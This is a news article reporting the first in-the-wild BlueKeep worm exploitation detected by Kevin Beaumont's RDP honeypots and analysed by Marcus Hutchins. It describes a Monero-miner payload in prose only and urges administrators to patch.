Security researchers are seeing the first indications of self-replicating malware or worms exploiting unpatched Windows systems vulnerable to the BlueKeep remote desktop protocol flaw.
Over the weekend, well-known OpenSecurity.global researcher Kevin Beaumont tweeted that his EternalPot RDP honeypots had started crash with Windows Blue Screen of Death (BSoD) in all regions they were deployed in bar Australia.
Honeypots are systems specifically set up by security researchers to catch exploit attempts.
Marcus Hutchins, a researcher who rose to instant fame after mitigating the destructive WannaCry ransomware attack and his arrest by United States authorities afterwards for alleged malware dissemination, chipped in with a preliminary analysis of the crashes.
Hutchins suspected they're due to a BlueKeep worm making the rounds.
It looks like a #BlueKeep worm has finally arrived! Kevin kindly sent me a crash dump and after some investigation I found BlueKeep artifacts in memory and shellcode to drop a Monero Miner. https://t.co/7G88YAW5lr
— MalwareTech (@MalwareTechBlog) November 2, 2019
Further analysis by Hutchins confirmed that this is a BlueKeep exploit, arriving some six months after the vulnerability was published.
The malicious code delivered by the worm downloads and executes a series of encoded Windows PowerShell commands.
These fetch another payload, an executable that runs a miner for the Monero crypto-currency.
Beaumont later said that "we found definite BlueKeep exploitation in wild across every country with a RDP honeypot (except Australia)."
He added in a blog post that there are over 724,000 internet-accessible systems that are not patched against the BlueKeep vulnerability.
Administrators should also patch internal systems against BlueKeep, as history has shown that worms can spread to these as well.
Microsoft has warned that the BlueKeep vulnerability is extremely serious, and could lead to another WannaCry malware epidemic, or worse.
Patches have been issued for vulnerable Windows systems, including Windows XP and Windows Server 2003, both of which are long out of support.
The Australian Cyber Security Centre has urged administrators to apply the available patches. as soon as possible.
